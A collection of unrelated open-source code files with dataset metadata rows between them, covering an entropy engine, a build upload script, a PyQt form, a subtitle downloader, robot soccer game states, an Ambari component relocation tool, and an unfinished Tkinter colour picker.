stats['info']['engine_uptime'] = time.time() - self.start_time
stats['info']['version'] = VERSION
if self.raw is not None:
stats['info']['stream'] = self.raw.get_name()
if self.drbg is not None:
stats['info']['seed'] = self.drbg.entropy_source.get_name()
stats['info']['drbg'] = self.drbg.get_name()
stats['consumed'] = entropysource.get_all_stats()
stats['produced'] = self.total_bytes
return stats
def cleanup(self):
'''Uninstantiate DRBG and close any raw entropy source'''
if self.drbg:
self.drbg.uninstantiate()
if self.raw:
self.raw.close_entropy_source()
#pylint: disable=R0911
def generate(self, n_bits, security_strength = None,
prediction_resistance = None, additional_input = ''):
'Generate bits from the entropy engine.'
#
# If we have a DRBG then use it
if self.drbg:
status, drbg_bits = self.drbg.generate(
n_bits, security_strength,
prediction_resistance, additional_input)
# The DRBG, once instantiated, should never fail
if status != 'SUCCESS' and status != 'RESEED_FAILED':
return status, "DRBG failed"
# If we are combining the DRBG with raw input then get raw bits
if self.raw:
status, raw_bits = self.raw.get_entropy_input(
security_strength, n_bits,
n_bits, prediction_resistance)
# Failure here is allowable, because we still have the DRBG
if status != 'SUCCESS':
logging.debug(
"Using drbg only. %s, %s", status, raw_bits)
self.total_bytes += len(drbg_bits)
return 'DRBG_ONLY', drbg_bits
# If we have both sources working then XOR them together
comb_bits = utilities.binstr_xor(drbg_bits, raw_bits)
self.total_bytes += len(comb_bits)
return 'SUCCESS', comb_bits
# If we only have a DRBG, then return just those bits
else:
self.total_bytes += len(drbg_bits)
return 'SUCCESS', drbg_bits
# If we have no DRBG then we must have a raw entropy source
elif self.raw:
status, raw_bits = self.raw.get_entropy_input(
security_strength, n_bits,
n_bits, prediction_resistance)
# If this fails with no DRBG to back it up, return an error
if status != 'SUCCESS':
return status, "Raw source failed"
# Otherwise return the raw bits
self.total_bytes += len(raw_bits)
return 'SUCCESS', raw_bits
# If we have neither DRBG nor raw source, we cannot generate bits
return 'ERROR', "Neither DRBG nor raw source available"
#pylint: enable=R0911
| apache-2.0 | 2,504,217,206,947,107,000 | 35.727273 | 79 | 0.579385 | false | 4.080808 | false | false | false |
ConorIA/wire-desktop | bin/win-hockey.py | 1 | 2241 | #!/usr/bin/env python
# coding: utf-8
#
# Wire
# Copyright (C) 2017 Wire Swiss GmbH
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses/.
#
import os
import requests
import zipfile
HOCKEY_ID = os.environ.get('WIN_HOCKEY_ID')
HOCKEY_TOKEN = os.environ.get('WIN_HOCKEY_TOKEN')
VERSION = os.environ.get('WRAPPER_BUILD').split('#')[1]
HOCKEY_UPLOAD = 'https://rink.hockeyapp.net/api/2/apps/%s/app_versions/' % HOCKEY_ID
HOCKEY_NEW = 'https://rink.hockeyapp.net/api/2/apps/%s/app_versions/new' % HOCKEY_ID
bin_root = os.path.dirname(os.path.realpath(__file__))
wire_exe = os.path.join(bin_root, '..', 'wrap', 'internal', 'WireInternal-win32-ia32', 'WireInternalSetup.exe')
wire_zip = os.path.join(bin_root, 'WireInternalSetup.zip')
def zipit(source, dest):
os.chdir(os.path.dirname(os.path.abspath(source)))
filename = os.path.basename(source)
zipf = zipfile.ZipFile(dest, 'w')
zipf.write(filename)
zipf.close()
if __name__ == '__main__':
print 'Compressing...'
zipit(wire_exe, wire_zip)
print 'Uploading %s...' % VERSION
semver_version = VERSION.split('.')
headers = {
'X-HockeyAppToken': HOCKEY_TOKEN,
}
data = {
'notify': 0,
'notes': 'Jenkins Build',
'status': 2,
'bundle_short_version': '%s.%s' % (semver_version[0], semver_version[1]),
'bundle_version': semver_version[2],
}
files = {
'ipa': open(wire_zip, 'rb')
}
response = requests.post(HOCKEY_NEW, data=data, headers=headers)
response = requests.put('%s%s' % (HOCKEY_UPLOAD, response.json()['id']), files=files, data=data, headers=headers)
if response.status_code in [200, 201]:
print 'Uploaded!'
else:
print 'Error :('
| gpl-3.0 | -7,979,401,355,987,615,000 | 28.88 | 115 | 0.686301 | false | 3.091034 | false | false | false |
danielhrisca/asammdf | asammdf/gui/ui/attachment.py | 1 | 1984 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'attachment.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Attachment(object):
def setupUi(self, Attachment):
Attachment.setObjectName("Attachment")
Attachment.resize(717, 205)
self.horizontalLayout = QtWidgets.QHBoxLayout(Attachment)
self.horizontalLayout.setObjectName("horizontalLayout")
self.number = QtWidgets.QLabel(Attachment)
self.number.setObjectName("number")
self.horizontalLayout.addWidget(self.number)
self.fields = QtWidgets.QTreeWidget(Attachment)
self.fields.setMinimumSize(QtCore.QSize(0, 187))
self.fields.setObjectName("fields")
self.fields.header().setVisible(True)
self.fields.header().setMinimumSectionSize(100)
self.horizontalLayout.addWidget(self.fields)
self.extract_btn = QtWidgets.QPushButton(Attachment)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(":/export.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.extract_btn.setIcon(icon)
self.extract_btn.setObjectName("extract_btn")
self.horizontalLayout.addWidget(self.extract_btn)
self.horizontalLayout.setStretch(1, 1)
self.retranslateUi(Attachment)
QtCore.QMetaObject.connectSlotsByName(Attachment)
def retranslateUi(self, Attachment):
_translate = QtCore.QCoreApplication.translate
Attachment.setWindowTitle(_translate("Attachment", "Form"))
self.number.setText(_translate("Attachment", "Number"))
self.fields.headerItem().setText(0, _translate("Attachment", "Item"))
self.fields.headerItem().setText(1, _translate("Attachment", "Value"))
self.extract_btn.setText(_translate("Attachment", "Extract"))
from . import resource_rc
| lgpl-3.0 | 7,336,654,808,283,836,000 | 42.088889 | 90 | 0.68246 | false | 4.266667 | false | false | false |
danielhollas/AmaraUpload | download_subs.py | 1 | 4471 | #!/usr/bin/env python3
import argparse, sys, os, requests
from subprocess import Popen, PIPE
from pprint import pprint
from api.amara_api import Amara
from utils import answer_me, download_yt_subtitles
from time import sleep
def read_cmd():
"""Function for reading command line options."""
desc = "Program for downloading subtitles from Amara or YouTube. \
The video from YouTube can be downloaded as well."
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('input_file', metavar='INPUT_FILE', help='Text file containing YouTube IDs and possibly filenames.')
parser.add_argument('-l','--lang', dest='lang', required = True, help='Which language do we download?')
parser.add_argument('-y', dest='youtube', action="store_true", help='Download subtitles from YouTube.')
parser.add_argument('-a', dest='amara', action="store_true", help='Download subtitles from Amara.')
parser.add_argument('-v', '--video', dest='video', action="store_true", default=False, help='Download video from YouTube in addition to subtitles.')
parser.add_argument('-d', '--dir', dest='dirname', default='subs', help='Destination directory for subtitles')
parser.add_argument(
'--sub-format', dest = 'sub_format',
required = False, default = 'vtt',
help='What language?')
parser.add_argument(
'-s', '--sleep', dest = 'sleep_int',
required = False, type = float, default = -1,
help='Sleep interval (seconds)')
return parser.parse_args()
opts = read_cmd()
if opts.youtube and opts.sub_format != 'vtt':
eprint("ERROR: YouTube download only support vtt format!")
sys.exit(1)
if opts.youtube == True and opts.amara == True:
print('Conflicting options "-y" and "-a"')
print('Type "-h" for help')
sys.exit(1)
if opts.youtube == False and opts.amara == False:
print('Please, set either "-y" or "-a".')
print('Type "-h" for help')
sys.exit(1)
# List ytids may also contain filenames
ytids = []
# Reading file with YT id's
with open(opts.input_file, "r") as f:
for line in f:
l = line.split(' ')
if l[0][0] != "#":
ytids.append(line.split())
if not os.path.isdir(opts.dirname):
os.mkdir(opts.dirname)
try:
os.remove("youtubedl.out")
os.remove("youtubedl.err")
except:
pass
if opts.amara:
amara = Amara()
# Main loop
for i in range(len(ytids)):
ytid = ytids[i][0]
video_url = 'https://www.youtube.com/watch?v=%s' % ytid
amara_id = ''
if opts.video:
video_download_cmd = "youtube-dl %s" % video_url
p = Popen(video_download_cmd, shell=True, stdout=PIPE, stderr=PIPE)
out, err = p.communicate()
with open("youtubedl.out", 'a') as f:
f.write(out.decode('UTF-8'))
if err:
print(err)
sys.exit(1)
else:
print("Successfully downloaded video from %s" % video_url)
if opts.youtube:
subs = download_yt_subtitles(opts.lang, opts.sub_format, ytid, opts.dirname)
elif opts.amara:
# TODO: Extract this to utils as well.
# First, get Amara ID
amara_response = amara.check_video(video_url)
if amara_response['meta']['total_count'] == 0:
print("ERROR: Video is not on Amara! YTID=%s" % ytid)
sys.exit(1)
else:
amara_id = amara_response['objects'][0]['id']
amara_title = amara_response['objects'][0]['title']
print("Downloading %s subtitles for YTID=%s" % (opts.lang, ytid))
print("Title: %s" % amara_title)
print("%s/cs/videos/%s" % (amara.AMARA_BASE_URL, amara_id))
# Check whether subtitles for a given language are present,
is_present, sub_version = amara.check_language(amara_id, opts.lang)
if is_present and sub_version > 0:
print("Subtitle revision number: %d" % sub_version)
else:
print("ERROR: Amara does not have subtitles for language %s for this video!" % opts.lang)
sys.exit(1)
# Download and write subtitles from Amara for a given language
subs = amara.download_subs(amara_id, opts.lang, opts.sub_format)
fname = "%s/%s.%s.%s" % (opts.dirname, ytid, opts.lang, opts.sub_format)
with open(fname, 'w') as f:
f.write(subs)
# Trying to reduce E 429
if opts.sleep_int > 0:
sleep(opts.sleep_int)
| mit | 8,237,329,518,348,567,000 | 35.647541 | 151 | 0.615075 | false | 3.428681 | false | false | false |
northern-bites/nao-man | noggin/players/BrunswickStates.py | 1 | 5661 | from ..playbook.PBConstants import (GOALIE, CHASER)
import man.motion.SweetMoves as SweetMoves
###
# Reimplementation of Game Controller States for pBrunswick
###
def gameInitial(player):
"""
Ensure we are sitting down and head is snapped forward.
In the future, we may wish to make the head move a bit slower here
Also, in the future, gameInitial may be responsible for turning off the gains
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.stopWalking()
player.gainsOn()
player.zeroHeads()
player.GAME_INITIAL_satDown = False
elif (player.brain.nav.isStopped() and not player.GAME_INITIAL_satDown
and not player.motion.isBodyActive()):
player.GAME_INITIAL_satDown = True
player.executeMove(SweetMoves.SIT_POS)
return player.stay()
def gamePenalized(player):
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.stopWalking()
player.penalizeHeads()
return player.stay()
def gameReady(player):
"""
Stand up, and pan for localization
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.brain.CoA.setRobotGait(player.brain.motion)
if player.squatting:
player.executeMove(SweetMoves.GOALIE_SQUAT_STAND_UP)
player.squatting = False
else:
player.standup()
if player.brain.gameController.ownKickOff:
player.hasKickedOffKick = False
else:
player.hasKickedOffKick = True
player.standup()
player.brain.tracker.locPans()
if player.lastDiffState == 'gameInitial':
return player.goLater('relocalize')
if player.firstFrame() and \
player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
return player.goLater('playbookPosition')
def gameSet(player):
"""
Fixate on the ball, or scan to look for it
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.brain.CoA.setRobotGait(player.brain.motion)
if player.firstFrame() and player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
if player.firstFrame():
player.stopWalking()
player.brain.loc.resetBall()
if player.brain.play.isRole(GOALIE):
player.brain.resetGoalieLocalization()
if player.brain.play.isRole(CHASER):
player.brain.tracker.trackBall()
else:
player.brain.tracker.activeLoc()
return player.stay()
def gamePlaying(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if (player.firstFrame() and
player.lastDiffState == 'gamePenalized'):
player.brain.resetLocalization()
roleState = player.getRoleState()
return player.goNow(roleState)
def penaltyShotsGameReady(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if player.firstFrame():
if player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
player.brain.tracker.locPans()
player.walkPose()
if player.brain.play.isRole(GOALIE):
player.brain.resetGoalieLocalization()
return player.stay()
def penaltyShotsGameSet(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if player.firstFrame():
player.stopWalking()
player.brain.loc.resetBall()
if player.lastDiffState == 'gamePenalized':
player.brain.resetLocalization()
if player.brain.play.isRole(GOALIE):
player.brain.tracker.trackBall()
else:
player.brain.tracker.activeLoc()
if player.brain.play.isRole(GOALIE):
player.brain.resetGoalieLocalization()
return player.stay()
def penaltyShotsGamePlaying(player):
if player.firstFrame():
player.brain.CoA.setRobotGait(player.brain.motion)
if player.lastDiffState == 'gamePenalized' and \
player.firstFrame():
player.brain.resetLocalization()
if player.brain.play.isRole(GOALIE):
return player.goNow('penaltyGoalie')
return player.goNow('penaltyKick')
def fallen(player):
"""
Stops the player when the robot has fallen
"""
player.isChasing = False
player.inKickingState = False
player.justKicked = False
return player.stay()
def gameFinished(player):
"""
Ensure we are sitting down and head is snapped forward.
In the future, we may wish to make the head move a bit slower here
Also, in the future, gameInitial may be responsible for turning off the gains
"""
if player.firstFrame():
player.isChasing = False
player.inKickingState = False
player.justKicked = False
player.stopWalking()
player.zeroHeads()
player.GAME_FINISHED_satDown = False
return player.stay()
# Sit down once we've finished walking
if (player.brain.nav.isStopped() and not player.GAME_FINISHED_satDown
and not player.motion.isBodyActive()):
player.GAME_FINISHED_satDown = True
player.executeMove(SweetMoves.SIT_POS)
return player.stay()
if not player.motion.isBodyActive() and player.GAME_FINISHED_satDown:
player.gainsOff()
return player.stay()
| gpl-3.0 | -1,766,548,898,769,186,300 | 29.766304 | 81 | 0.661367 | false | 3.683149 | false | false | false |
zouzhberk/ambaridemo | demo-server/src/main/resources/scripts/relocate_host_components.py | 1 | 16871 | #!/usr/bin/env python
'''
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
import optparse
import sys
import os
import logging
import tempfile
import urllib2
import socket
import json
import base64
import time
AMBARI_HOSTNAME = None
AMBARI_PORT = 8080
CLUSTER_NAME = None
PROTOCOL = "http"
USERNAME = "admin"
PASSWORD = "admin"
DEFAULT_TIMEOUT = 10 # seconds
START_ON_RELOCATE = False
# Supported Actions
RELOCATE_ACTION = 'relocate'
ALLOWED_ACTUAL_STATES_FOR_RELOCATE = [ 'INIT', 'UNKNOWN', 'DISABLED', 'UNINSTALLED' ]
ALLOWED_HOST_STATUS_FOR_RELOCATE = [ 'HEALTHY' ]
STATUS_WAIT_TIMEOUT = 120 # seconds
STATUS_CHECK_INTERVAL = 10 # seconds
# API calls
GET_CLUSTERS_URI = "/api/v1/clusters/"
GET_HOST_COMPONENTS_URI = "/api/v1/clusters/{0}/services/{1}/components/{2}" +\
"?fields=host_components"
GET_HOST_COMPONENT_DESIRED_STATE_URI = "/api/v1/clusters/{0}/hosts/{1}" +\
"/host_components/{2}" +\
"?fields=HostRoles/desired_state"
GET_HOST_COMPONENT_STATE_URI = "/api/v1/clusters/{0}/hosts/{1}" +\
"/host_components/{2}" +\
"?fields=HostRoles/state"
GET_HOST_STATE_URL = "/api/v1/clusters/{0}/hosts/{1}?fields=Hosts/host_state"
HOST_COMPONENT_URI = "/api/v1/clusters/{0}/hosts/{1}/host_components/{2}"
ADD_HOST_COMPONENT_URI = "/api/v1/clusters/{0}/hosts?Hosts/host_name={1}"
logger = logging.getLogger()
class PreemptiveBasicAuthHandler(urllib2.BaseHandler):
def __init__(self):
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_mgr.add_password(None, getUrl(''), USERNAME, PASSWORD)
self.passwd = password_mgr
self.add_password = self.passwd.add_password
def http_request(self, req):
uri = req.get_full_url()
user = USERNAME
pw = PASSWORD
raw = "%s:%s" % (user, pw)
auth = 'Basic %s' % base64.b64encode(raw).strip()
req.add_unredirected_header('Authorization', auth)
return req
class AmbariResource:
def __init__(self, serviceName, componentName):
self.serviveName = serviceName
self.componentName = componentName
self.isInitialized = False
def initializeResource(self):
global CLUSTER_NAME
if CLUSTER_NAME is None:
CLUSTER_NAME = self.findClusterName()
if self.serviveName is None:
raise Exception('Service name undefined')
if self.componentName is None:
raise Exception('Component name undefined')
handler = PreemptiveBasicAuthHandler()
opener = urllib2.build_opener(handler)
# Install opener for all requests
urllib2.install_opener(opener)
self.urlOpener = opener
self.old_hostname = self.getHostname()
self.isInitialized = True
def relocate(self, new_hostname):
if not self.isInitialized:
raise Exception('Resource not initialized')
# If old and new hostname are the same exit harmlessly
if self.old_hostname == new_hostname:
logger.error('New hostname is same as existing host name, %s' % self.old_hostname)
sys.exit(2)
pass
try:
self.verifyHostComponentStatus(self.old_hostname, new_hostname, self.componentName)
except Exception, e:
logger.error("Exception caught on verify relocate request.")
logger.error(e.message)
sys.exit(3)
# Put host component in Maintenance state
self.updateHostComponentStatus(self.old_hostname, self.componentName,
"Disable", "DISABLED")
# Delete current host component
self.deleteHostComponent(self.old_hostname, self.componentName)
# Add component on the new host
self.addHostComponent(new_hostname, self.componentName)
# Install host component
self.updateHostComponentStatus(new_hostname, self.componentName,
"Installing", "INSTALLED")
# Wait on install
self.waitOnHostComponentUpdate(new_hostname, self.componentName,
"INSTALLED")
if START_ON_RELOCATE:
# Start host component
self.updateHostComponentStatus(new_hostname, self.componentName,
"Starting", "STARTED")
# Wait on start
self.waitOnHostComponentUpdate(new_hostname, self.componentName, "STARTED")
pass
pass
def waitOnHostComponentUpdate(self, hostname, componentName, status):
logger.info("Waiting for host component status to update ...")
sleep_itr = 0
state = None
while sleep_itr < STATUS_WAIT_TIMEOUT:
try:
state = self.getHostComponentState(hostname, componentName)
if status == state:
logger.info("Status update successful. status: %s" % state)
return
pass
except Exception, e:
logger.error("Caught an exception waiting for status update.. "
"continuing to wait...")
pass
time.sleep(STATUS_CHECK_INTERVAL)
sleep_itr += STATUS_CHECK_INTERVAL
pass
if state and state != status:
logger.error("Timed out on wait, status unchanged. status = %s" % state)
sys.exit(1)
pass
pass
def addHostComponent(self, hostname, componentName):
data = '{"host_components":[{"HostRoles":{"component_name":"%s"}}]}' % self.componentName
req = urllib2.Request(getUrl(ADD_HOST_COMPONENT_URI.format(CLUSTER_NAME,
hostname)), data)
req.add_header("X-Requested-By", "ambari_probe")
req.get_method = lambda: 'POST'
try:
logger.info("Adding host component: %s" % req.get_full_url())
resp = self.urlOpener.open(req)
self.logResponse('Add host component response: ', resp)
except Exception, e:
logger.error('Create host component failed, component: {0}, host: {1}'
.format(componentName, hostname))
logger.error(e)
raise e
pass
def deleteHostComponent(self, hostname, componentName):
req = urllib2.Request(getUrl(HOST_COMPONENT_URI.format(CLUSTER_NAME,
hostname, componentName)))
req.add_header("X-Requested-By", "ambari_probe")
req.get_method = lambda: 'DELETE'
try:
logger.info("Deleting host component: %s" % req.get_full_url())
resp = self.urlOpener.open(req)
self.logResponse('Delete component response: ', resp)
except Exception, e:
logger.error('Delete {0} failed.'.format(componentName))
logger.error(e)
raise e
pass
def updateHostComponentStatus(self, hostname, componentName, contextStr, status):
# Update host component
data = '{"RequestInfo":{"context":"%s %s"},"Body":{"HostRoles":{"state":"%s"}}}' % (contextStr, self.componentName, status)
req = urllib2.Request(getUrl(HOST_COMPONENT_URI.format(CLUSTER_NAME,
hostname, componentName)), data)
req.add_header("X-Requested-By", "ambari_probe")
req.get_method = lambda: 'PUT'
try:
logger.info("%s host component: %s" % (contextStr, req.get_full_url()))
resp = self.urlOpener.open(req)
self.logResponse('Update host component response: ', resp)
except Exception, e:
logger.error('Update Status {0} failed.'.format(componentName))
logger.error(e)
raise e
pass
def verifyHostComponentStatus(self, old_hostname, new_hostname, componentName):
# Check desired state of host component is not STOPPED or host is
# unreachable
actualState = self.getHostComponentState(old_hostname, componentName)
if actualState not in ALLOWED_ACTUAL_STATES_FOR_RELOCATE:
raise Exception('Aborting relocate action since host component '
'state is %s' % actualState)
hostState = self.getHostSatus(new_hostname)
if hostState not in ALLOWED_HOST_STATUS_FOR_RELOCATE:
raise Exception('Aborting relocate action since host state is %s' % hostState)
pass
def getHostSatus(self, hostname):
hostStateUrl = getUrl(GET_HOST_STATE_URL.format(CLUSTER_NAME, hostname))
logger.info("Requesting host status: %s " % hostStateUrl)
urlResponse = self.urlOpener.open(hostStateUrl)
state = None
if urlResponse:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from getHostSatus: %s' % data)
if data:
try:
hostsInfo = data.get('Hosts')
if not hostsInfo:
raise Exception('Cannot find host state for host: {1}'.format(hostname))
state = hostsInfo.get('host_state')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve host state.")
pass
return state
def getHostComponentState(self, hostname, componentName):
hostStatusUrl = getUrl(GET_HOST_COMPONENT_STATE_URI.format(CLUSTER_NAME,
hostname, componentName))
logger.info("Requesting host component state: %s " % hostStatusUrl)
urlResponse = self.urlOpener.open(hostStatusUrl)
state = None
if urlResponse:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from getHostComponentState: %s' % data)
if data:
try:
hostRoles = data.get('HostRoles')
if not hostRoles:
raise Exception('Cannot find host component state for component: ' +\
'{0}, host: {1}'.format(componentName, hostname))
state = hostRoles.get('state')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve host component desired state.")
pass
return state
# Log response for PUT, POST or DELETE
def logResponse(self, text=None, response=None):
if response is not None:
resp = str(response.getcode())
if text is None:
text = 'Logging response from server: '
if resp is not None:
logger.info(text + resp)
def findClusterName(self):
clusterUrl = getUrl(GET_CLUSTERS_URI)
clusterName = None
logger.info("Requesting clusters: " + clusterUrl)
urlResponse = self.urlOpener.open(clusterUrl)
if urlResponse is not None:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from findClusterName: %s' % data)
if data:
try:
clusters = data.get('items')
if len(clusters) > 1:
raise Exception('Multiple clusters found. %s' % clusters)
clusterName = clusters[0].get('Clusters').get('cluster_name')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve clusters data.")
pass
return clusterName
def getHostname(self):
hostsUrl = getUrl(GET_HOST_COMPONENTS_URI.format(CLUSTER_NAME,
self.serviveName, self.componentName))
logger.info("Requesting host info: " + hostsUrl)
urlResponse = self.urlOpener.open(hostsUrl)
hostname = None
if urlResponse is not None:
response = urlResponse.read()
data = json.loads(response)
logger.debug('Response from getHostname: %s' % data)
if data:
try:
hostRoles = data.get('host_components')
if not hostRoles:
raise Exception('Cannot find host component data for service: ' +\
'{0}, component: {1}'.format(self.serviveName, self.componentName))
if len(hostRoles) > 1:
raise Exception('More than one hosts found with the same role')
hostname = hostRoles[0].get('HostRoles').get('host_name')
except Exception, e:
logger.error('Unable to parse json data. %s' % data)
raise e
pass
else:
logger.error("Unable to retrieve host component data.")
pass
return hostname
def getUrl(partial_url):
return PROTOCOL + "://" + AMBARI_HOSTNAME + ":" + AMBARI_PORT + partial_url
def get_supported_actions():
return [ RELOCATE_ACTION ]
#
# Main.
#
def main():
tempDir = tempfile.gettempdir()
outputFile = os.path.join(tempDir, "ambari_reinstall_probe.out")
parser = optparse.OptionParser(usage="usage: %prog [options]")
parser.set_description('This python program is a Ambari thin client and '
'supports relocation of ambari host components on '
'Ambari managed clusters.')
parser.add_option("-v", "--verbose", dest="verbose", action="store_false",
default=False, help="output verbosity.")
parser.add_option("-s", "--host", dest="server_hostname",
help="Ambari server host name.")
parser.add_option("-p", "--port", dest="server_port",
default="8080" ,help="Ambari server port. [default: 8080]")
parser.add_option("-r", "--protocol", dest="protocol", default = "http",
help="Protocol for communicating with Ambari server ("
"http/https) [default: http].")
parser.add_option("-c", "--cluster-name", dest="cluster_name",
help="Ambari cluster to operate on.")
parser.add_option("-e", "--service-name", dest="service_name",
help="Ambari Service to which the component belongs to.")
parser.add_option("-m", "--component-name", dest="component_name",
help="Ambari Service Component to operate on.")
parser.add_option("-n", "--new-host", dest="new_hostname",
help="New host to relocate the component to.")
parser.add_option("-a", "--action", dest="action", default = "relocate",
help="Script action. [default: relocate]")
parser.add_option("-o", "--output-file", dest="outputfile",
default = outputFile, metavar="FILE",
help="Output file. [default: %s]" % outputFile)
parser.add_option("-u", "--username", dest="username",
default="admin" ,help="Ambari server admin user. [default: admin]")
parser.add_option("-w", "--password", dest="password",
default="admin" ,help="Ambari server admin password.")
parser.add_option("-d", "--start-component", dest="start_component",
action="store_false", default=False,
help="Should the script start the component after relocate.")
(options, args) = parser.parse_args()
# set verbose
if options.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
global AMBARI_HOSTNAME
AMBARI_HOSTNAME = options.server_hostname
global AMBARI_PORT
AMBARI_PORT = options.server_port
global CLUSTER_NAME
CLUSTER_NAME = options.cluster_name
global PROTOCOL
PROTOCOL = options.protocol
global USERNAME
USERNAME = options.username
global PASSWORD
PASSWORD = options.password
global START_ON_RELOCATE
START_ON_RELOCATE = options.start_component
global logger
logger = logging.getLogger('AmbariProbe')
handler = logging.FileHandler(options.outputfile)
formatter = logging.Formatter('%(asctime)s %(levelname)s %(message)s')
handler.setFormatter(formatter)
logger.addHandler(handler)
action = RELOCATE_ACTION
if options.action is not None:
if options.action not in get_supported_actions():
logger.error("Unsupported action: " + options.action + ", "
"valid actions: " + str(get_supported_actions()))
sys.exit(1)
else:
action = options.action
socket.setdefaulttimeout(DEFAULT_TIMEOUT)
ambariResource = AmbariResource(serviceName=options.service_name,
componentName=options.component_name)
ambariResource.initializeResource()
if action == RELOCATE_ACTION:
if options.new_hostname is not None:
ambariResource.relocate(options.new_hostname)
if __name__ == "__main__":
try:
main()
except (KeyboardInterrupt, EOFError):
print("\nAborting ... Keyboard Interrupt.")
sys.exit(1)
| apache-2.0 | 7,550,866,551,426,205,000 | 33.501022 | 127 | 0.645249 | false | 3.966847 | false | false | false |
fablab-bayreuth/fablight | Fablight-Gui/hcl_picker.py | 1 | 6705 |
from numpy import *
from colorsys import *
import Tkinter as tk
import ttk
import PIL.Image, PIL.ImageTk
ir = lambda x: int(round(x))
#-----------------------------------------------------------------------------------------
# H(CL) picker
class H_CL_Picker:
hue_panel_size = 256, 256
r0, r1 = 0.4*hue_panel_size[0], 0.5*hue_panel_size[0] # Hue circle radii
rt = r0-5 # CL-Triangle outer radius
hue_img, cl_img = None, None
hue, sat, val = 0, 0, 0
def __init__( self, parent, color_broadcast=None ):
self.parent = parent
self.frame = tk.Frame(self.parent)
self.colorbc = color_broadcast
# Get initial color
self.receive_color()
# setup frames
self.canvas = tk.Canvas(self.frame, bd=-2, width=self.hue_panel_size[0], height=self.hue_panel_size[1] )
# Create initial images
self.draw()
# bind event handlers
self.canvas.bind('<Button-1>', self.on_hue_click)
self.canvas.bind('<B1-Motion>', self.on_hue_click)
self.parent.bind('<<NotebookTabChanged>>', self.on_tab_changed)
self.place()
def place(self, **args): # place frames on grid
self.frame.grid(args)
self.canvas.grid(column=0, row=0, padx=(12,12), pady=(12,12), sticky=tk.N+tk.S)
def draw(self):
self.draw_hue()
self.draw_cl()
def draw_hue(self):
W,H = self.hue_panel_size
r0,r1 = self.r0, self.r1
xm,ym = W/2.,H/2.
if (self.hue_img==None): # First call, create static hue-image
d = 255*array([hsv_to_rgb(1.-x,0.9,0.9) for x in arange(256)/255.])
self.hue_data = d.copy()
hue_scale = zeros((H,W,4), dtype=uint8)
# Draw hue circle. THIS IS VERY SLOW!
for y in range(int(ym),H):
clip = lambda x,a,b: a if x<a else (b if x>b else x)
if y-ym>= r0: x0 = xm
else: x0 = clip( xm + sqrt(r0**2-(y-ym)**2), xm, W-1 )
if y-ym>= r1: continue
else: x1 = clip( xm + sqrt(r1**2-(y-ym)**2), xm, W-1 )
for x in range(int(x0), int(x1)):
p = arctan2( y-ym, x-xm )/(2*pi)
hue_scale[y,x] = r_[ d[int(255*p)], 255 ]
hue_scale[H-1-y,x] = r_[ d[int(255*(1-p))], 255 ]
hue_scale[y,W-1-x] = r_[ d[int(255*(0.5-p))], 255 ]
hue_scale[H-1-y,W-1-x] = r_[ d[int(255*(0.5+p))], 255 ]
hue_img = PIL.Image.frombuffer('RGBA', (W,H), hue_scale, 'raw', 'RGBA', 0, 1)
self.hue_img = PIL.ImageTk.PhotoImage( hue_img )
self.canvas.create_image( 0,0, anchor=tk.NW, image=self.hue_img, tag='hue_img' )
phi = self.hue*2*pi
self.hue_marker = self.canvas.create_line(xm+r0*cos(phi), ym+r0*sin(phi),
xm+r1*cos(phi), ym+r1*sin(phi))
self.canvas.tag_bind('hue_img', '<Button-1>', self.foo_hue)
else:
phi = -self.hue*2*pi
self.canvas.coords( self.hue_marker, xm+r0*cos(phi), ym+r0*sin(phi),
xm+r1*cos(phi), ym+r1*sin(phi) )
def foo_hue(self, event):
print 'Fooo Hue'
def draw_cl(self):
W,H = self.hue_panel_size
ro = self.rt ## triangle outer radius
xm,ym = W/2.,H/2.
a = ir(sqrt(3.)*ro) ## Triangle side-length
ri = ir(0.5*ro) ## Triangle inner radius
bw = ir(2*ro) ## width of bounding box
print 'a=', a, 'bw-ri=', bw-ri
if (self.cl_img==None):
# Create triangle mask
